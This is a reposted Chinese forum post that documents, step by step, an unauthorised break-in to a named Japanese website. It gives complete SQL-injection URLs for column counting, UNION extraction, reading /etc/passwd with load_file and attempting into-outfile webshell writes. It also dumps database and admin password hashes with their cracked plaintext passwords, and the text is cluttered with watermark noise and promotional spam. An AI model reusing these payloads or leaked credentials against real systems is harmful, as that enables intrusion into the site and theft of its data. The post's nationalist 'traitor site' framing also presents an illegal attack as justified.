原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

9 M5 G4 F6 W5 Z, k2 K  j  [0 H' a# H- g
0x01. 检测 www.zuaa.jp 收集数据


whatweb

. z8 O5 P4 E! ?4 X- k% n5 V2 V
利用NMAP扫描
( O8 W+ D1 t' Y, h$ g6 U
: o8 T2 H+ g) E中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
/ ^& B- y# P0 D$ u$ @0x02.找注入点
8 `: f4 G( p4 B# K找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
* b$ p. z: G2 K2 V4 V
# y2 [, k- s3 o' T; ?
0x03.order by
( ~; W2 ~" }! j3 l( i1 v             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
3 v# l' L" M0 Z. Q+ u+ Q/ G
order by 28报错，order by 27正常

* K2 h1 w, u/ ^. M0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
' T! d5 m5 }4 E: r" a* X+ a- \# }添加到 27 时正常显示

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0 O6 |; T5 }4 _6 K- {
# f. |* B: L, E& ^0x05. info:
, i0 K) J* e. }- W6 k7 A- Ehttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
! W3 Y5 X" q( x
* x4 m6 k7 M3 U3 q- {% tuser:            root@localhost
3 S: u& K, H* H8 ?database:    openpne
  O# k& x/ ?7 W$ ~version:      4.1.22
os:             portbld-freebsd5.4

0x06. root用户
2 A) v1 `& Q8 E利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
# b) e( g- z8 H) c8 X/ }' B, T5 chttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

- I) J) j- L  ^# b" K% N0 M通过工具转换
5 v8 w9 D5 ~, w! d$ F4 H, B
/ D. B: |3 Z$ T6 v) l+ }2 m中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
# P! _6 ]$ X0 x  |$ Z7 E
0 X9 M+ H  U" h# L2 e. e0x07. 利用 into outfile
全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php

http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

! x. _9 i) Q. M  V. X6 i* t页面显示“MDB2 Error:syntax error”

$ A) j% Z- W6 |4 d! }* K0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
% n! @0 s" i9 r$ @! V9 w中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
# j$ Q( M3 ]+ V) E

' G8 @0 ?+ E; f% W  D9 I+ g
7 A" W/ B" N% I2 w# H0x09. 查找后台
- X8 M* j" k2 Y+ A利用 现有的各种 后台工具尝试都不行
8 u; m# X0 P  S5 @" y0 U; \/ O
0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
) M' D( O+ B! \http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

这个可以在 www.cmd5.com 解密
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
1 j" T; ]# K( x+ r工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知


0x11. 网站突破
4 {6 \% x, D$ `4 p3 J' H. W1 [发现网站的源程序 openpne, google 下载 openpne 源码
; S. w5 A2 U; N5 f) q6 d
7 o- ]0 D; P, H, `+ F
0x12. 默认信息利用
' O6 @) Y' q, ^http://sns.zuaa.jp/?m=admin&a=page_login
' u/ H1 s! b" Q" s3 u7 x+ y
: K- m& [, T8 ^表名 (c_admin_user) ，字段名（username,password）
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
9 @' H+ ]$ _' _
解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
0 b! p& c1 L7 ^' X8 izuaajp:c0923ec5857796a393da99905008c176,          zju1897

2 N" n$ Z5 |/ ~. G* O9 ?0 F中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x13. 登录后台

+ Q- z! l% F8 J' |0 q. {! Q0 u. J- @
: H* G" X# q2 T; H
# i: C+ |- D, J0x14. 小结
# g  o% r: R8 e$ {: l: I利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
6 C) W; o6 R. v. B! P; G感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
4 C; m4 `7 L- m4 {' p中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
6 M9 J4 E% {5 \/ u* ~  h
最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
; N! r' `( b9 a4 `1 D+ K$ S5 |

荒村狂客

哪个牛人 费的这劲 入侵的